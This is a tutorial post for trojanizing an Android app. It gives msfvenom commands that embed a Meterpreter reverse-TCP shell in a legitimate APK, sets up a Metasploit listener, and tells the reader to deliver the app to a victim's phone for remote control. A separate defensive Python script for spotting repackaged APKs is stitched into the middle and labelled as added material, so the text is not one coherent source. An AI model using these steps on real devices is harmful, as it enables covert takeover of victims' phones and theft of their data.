Hack Android by poisoning apps
Add malware to an original app (e.g. Instagram, Flappy Bird)
When the user runs the app, it acts and works like a normal app, but in a nutshell we have full control over the target's phone
DO NOT USE THIS FOR ILLEGAL STUFF
REQUIREMENTS
- A decent hacking Linux distro (e.g. Kali, Parrot) [ RECOMMENDED ]
- Or a system with MSFVENOM & METASPLOIT [ MUST ]
- Target and attacker must be on the same network (at least both should be able to communicate over IPv4) [ MUST ]
1. DOWNLOAD AN APK FILE
You need an APK file to poison; you can download one or create it.
2. POISON THE APP
We are going to use MSFVENOM to poison the app
# format
msfvenom -x <downloaded-apk-file> -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> -o payload.apk
-x selects the APK file, -p specifies the payload that we are going to use.
# for my case
msfvenom -x app.apk -p android/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -o payload.apk
This will generate payload.apk in the current folder
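Seen from the defending side, the output of step 2 is a repackaged APK: its code differs from the publisher's build and it cannot carry the publisher's signature. The Python check below is an added example, not part of the original post; it diffs a suspect APK against a reference copy of the same version, and the function names and in-memory sample archives are constructed for illustration.

```python
import hashlib
import io
import zipfile

SIG_SUFFIXES = (".RSA", ".DSA", ".EC", ".SF")  # v1 (JAR) signature files

def apk_digests(apk_bytes):
    """Map every entry in an APK (a ZIP archive) to its SHA-256 digest."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {i.filename: hashlib.sha256(zf.read(i)).hexdigest()
                for i in zf.infolist() if not i.is_dir()}

def compare_apks(reference, suspect):
    """Diff a suspect APK against the publisher's build of the same version."""
    ref, sus = apk_digests(reference), apk_digests(suspect)
    report = {
        "added": sorted(sus.keys() - ref.keys()),
        "removed": sorted(ref.keys() - sus.keys()),
        "changed": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
    }
    touched = report["added"] + report["removed"] + report["changed"]
    # Injected code shows up in the DEX files and usually the manifest.
    report["code_changed"] = any(
        n.endswith(".dex") or n == "AndroidManifest.xml" for n in touched)
    # Re-signing replaces the v1 signature files; v2+ signatures sit outside
    # the ZIP entries and are not covered by this check.
    report["signing_changed"] = any(
        n.startswith("META-INF/") and n.upper().endswith(SIG_SUFFIXES)
        for n in touched)
    report["matches_reference"] = not touched
    return report

def build_sample_apk(entries):
    """Build a constructed in-memory ZIP standing in for an APK (sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed sample inputs, not real apps.
ORIGINAL = build_sample_apk({"res/icon.png": b"icon", "AndroidManifest.xml": b"manifest",
    "classes.dex": b"dex", "META-INF/CERT.SF": b"sf", "META-INF/CERT.RSA": b"rsa"})
TAMPERED = build_sample_apk({"res/icon.png": b"icon",
    "AndroidManifest.xml": b"manifest+perms", "classes.dex": b"dex+extra",
    "META-INF/RESIGNED.SF": b"sf2", "META-INF/RESIGNED.RSA": b"rsa2"})

if __name__ == "__main__":
    print(compare_apks(ORIGINAL, TAMPERED))
```

For real files, pass the bytes of both APKs; `apksigner verify --print-certs` from the Android SDK build tools covers the v2+ signature schemes that this ZIP-level diff does not see.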
3. START LISTENER
We are using METASPLOIT for the listener
The listener should be running before the target uses the app
Fire up METASPLOIT
$ msfconsole
use exploit/multi/handler
msf6 > use exploit/multi/handler
Fill in the options; you can see all options by typing show options
We need to set LHOST, LPORT & PAYLOAD
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>
Run the exploit
run
Now the listener will start; wait until the victim installs the app
4. DELIVER THE APP
You could use any delivery method to get the app onto the target phone
[ I'm gonna skip this part because this is not our topic ]
When the victim installs the app, you should get a Meterpreter shell back. CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE